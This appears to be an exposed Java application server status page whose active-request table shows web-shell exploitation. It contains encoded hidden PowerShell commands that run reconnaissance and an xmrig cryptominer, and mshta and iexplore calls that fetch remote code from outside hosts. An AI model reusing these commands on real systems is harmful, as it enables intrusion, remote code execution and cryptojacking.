JVM

Free memory: 71.22 MB Total memory: 155.75 MB Max memory: 493.06 MB

ajp-0.0.0.0-8009

Max threads: 40 Current thread count: 0 Current thread busy: 0
Max processing time: 0 ms Processing time: 0.0 s Request count: 0 Error count: 0 Bytes received: 0.00 MB Bytes sent: 0.00 MB

StageTimeB SentB RecvClientVHostRequest

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive

http-0.0.0.0-8080

Max threads: 250 Current thread count: 117 Current thread busy: 90
Max processing time: 308805 ms Processing time: 67017.375 s Request count: 159908 Error count: 6021 Bytes received: 23.64 MB Bytes sent: 2648.65 MB

StageTimeB SentB RecvClientVHostRequest
S1681868562 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1681140308 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1680890814 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1843150646 ms0 KB0 KB154.160.16.132catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
S1681381484 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1519479291 ms8 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1681625096 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1681748330 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1681020089 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1681988796 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1843569016 ms0 KB7 KB154.160.16.132catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
S1842333560 ms0 KB0 KB154.160.16.132catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
S1681504879 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1520080546 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1681260613 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1519357724 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1519719773 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADEAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S1519117266 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1396297037 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1519839982 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1520444367 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1396417354 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1095134444 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1519599627 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADEAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S1519237584 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1095314108 ms8 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1520200883 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1520321111 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1519960292 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1396931297 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1396811043 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1396537583 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1395936432 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADEAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S1094387973 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1397299887 ms8 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1396687798 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1095255961 ms8 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1397174776 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1396056671 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1396659136 ms8 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1094024239 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADEAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S1397054820 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1396177156 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1094749353 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1395816478 ms0 KB0 KB106.114.78.22281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADEAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S1094628909 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1353948064 ms0 KB0 KB206.253.167.21381.45.140.46GET /jexws4/jexws4.jsp?ppp=%22C%3A%5CProgram+Files%5CInternet+Explorer%5Ciexplore.exe%22+http%3A%2F%2Ftakkasihinfo.online%2F HTTP/1.1
S1094891251 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1095011490 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1094508493 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S1094265012 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S1093773712 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1094144749 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADEAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S1094871659 ms8 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1093895250 ms8 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1093533232 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S618392278 ms16 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1093653494 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S969574992 ms8 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S970493730 ms8 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S969815480 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADEAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S618873246 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S969210549 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S969330772 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S619249079 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S619373761 ms16 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S969695319 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADEAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S970369636 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S970056079 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S969451019 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S969935864 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S618993580 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S315110797 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
S315182739 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
S313899217 ms0 KB0 KB1.36.182.189catalogo.museolazarogaldiano.esGET /shell/shell.jsp?ppp=mshta%20http://81.70.213.71:1444/ HTTP/1.1
S618632882 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADEAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S619113804 ms0 KB0 KB106.114.80.14381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
